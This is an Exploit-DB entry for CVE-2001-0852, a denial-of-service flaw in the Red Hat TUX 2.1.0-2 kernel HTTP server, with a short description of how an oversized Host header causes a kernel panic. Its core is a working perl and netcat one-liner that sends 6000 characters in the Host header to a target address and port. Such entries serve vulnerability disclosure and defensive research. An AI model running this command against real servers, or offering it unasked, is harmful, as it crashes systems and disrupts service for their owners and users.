Red Hat TUX 2.1.0-2 - HTTP Server Oversized Host Denial of Service Vulnerability

2001-11-05T00:00:00
ID EDB-ID:21141
Type exploitdb
Reporter Aiden ORawe
Modified 2001-11-05T00:00:00

Description

Red Hat TUX 2.1 .0-2 HTTP Server Oversized Host Denial of Service Vulnerability. CVE-2001-0852 . Dos exploit for linux platform

                                        
                                            source: http://www.securityfocus.com/bid/3506/info

TUX is a kernel based HTTP server released under the GNU General Public License. It is able to serve static content, cache dynamic content, and coordinate with other HTTP servers to produce dynamic content.

An error exists when the TUX daemon received an oversized Host: header as part of a HTTP request. The request will result in an assertation failure and eventually in a kernel panic. At this point a system reboot will be required to regain normal functionality. 

perl -e "print qq(GET / HTTP/1.0\nAccept: */*\nHost: ) . qq(A) x 6000 .
qq(\n)" |nc <ip address> <dest_port>